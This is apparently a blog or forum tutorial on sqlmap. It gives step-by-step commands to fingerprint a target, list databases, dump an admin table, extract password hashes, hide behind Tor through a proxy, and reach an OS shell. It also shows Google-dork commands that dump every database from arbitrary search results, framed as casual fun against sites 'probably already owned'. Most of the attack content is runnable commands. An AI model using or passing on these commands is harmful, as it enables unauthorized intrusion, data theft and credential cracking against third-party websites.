SQLMap - Basic / Intermediate usage

So I've recently been interested in web security a bit more and while learning more about SQL injections I came across a tool I found handy. This is sqlmap, an SQL Injection and Database takeover tool. Sqlmap can handle a variety of database management systems such as MS SQL, MYSQL, Oracle and so on. It supports five injection techniques - boolean-based blind, time-based blind, error-based, UNION query and stacked queries. It can retrieve tables, along with its contents. It also has a built in hash cracking function to attempt to crack known hash's with a dictionary based attack. It has many other fun features such as metasploit interaction for privilege escalation and utilization of google dorks, which I will give an example of below.

This command with use a given google dork and attempt to dump all available information from all the results on the first page of google. 

python sqlmap.py --dump-all -g "inurl:prodID=3030"

Now this could come in handy when pentesting because you could use google dorks to focus in on the target and spider it for specific pages or just more possible vulnerabilities. Or just  use it for the general dork fun. You can also choose a different page for the google results as the default is the first page and those have probably already been owned. Also, so we can multitask and be notified when an sql injection is found we can will add the following beep command.

python sqlmap.py --dump-all -g "inurl:prodID=3030" --gpage 3 --beep

Another possibility when targeting a specific target in a pentest you can do something like this;


python sqlmap.py -g "site:'hakhub.tk' inurl:'/prodID='" --current-user --passwords

You can also specify certain things to extract to save time which I'm sure you'll see. To start off we will fingerprint the system to get an idea of what we're dealing with. Than we will find the databases and tables with verbosity and proceed to issue another command to extract the current user and password hash's.

python sqlmap.py -u www.example.com/shop/prodID=777 -f

If all's we'll proceed to issue the following commands, this will automate the process (--batch) and show us the estimated time (--eta); 

python sqlmap.py -u www.example.com/shop/prodID=777 --dbs --tables -v 6 --batch --eta

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB --tables --batch --eta

Now we know the example DBase have a table named ex_admin, so we'll pull that tables columns.

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump -batch --eta

If we wanted to do this via a proxy, you can use the --proxy flag as I will show you. We'll assume you've got tor and polipo up and running.

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump --batch --eta --proxy=http://127.0.0.1:8123

You can also brute force common tables and column with the --common-tables feature abd play around with the OS Takeover portion of it with --os-pwn (which utilizes metasploit) and --os-shell.


There's alot more this tool can do so check out the following site to learn more - http://sqlmap.sourceforge.net/doc/README.html#ss1.2

You may also find this sql "cheat sheet" useful - http://sql-tutorial.net/SQL-Cheat-Sheet.pdf